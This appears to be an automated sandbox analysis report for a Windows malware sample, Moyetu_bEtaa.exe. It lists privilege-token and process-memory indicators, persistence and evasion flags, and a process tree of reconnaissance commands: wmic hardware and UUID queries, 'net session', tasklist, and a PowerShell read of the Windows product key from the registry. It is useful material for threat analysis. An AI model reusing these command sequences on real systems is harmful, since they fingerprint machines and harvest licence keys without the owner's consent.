N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4576 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 4576 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\System32\Wbem\wmic.exe
PID 3068 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\System32\Wbem\wmic.exe
PID 3068 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 1564 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1564 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe
PID 3068 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 792 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 792 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3068 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2664 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

C:\Windows\System32\Wbem\wmic.exe

wmic os get locale

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo wlan"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1392 --field-trial-handle=1592,3518301591304884466,13171068627778377155,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1824 --field-trial-handle=1592,3518301591304884466,13171068627778377155,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4576 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4576 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4576 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4576 get ExecutablePath

C:\Windows\system32\cmd.exe

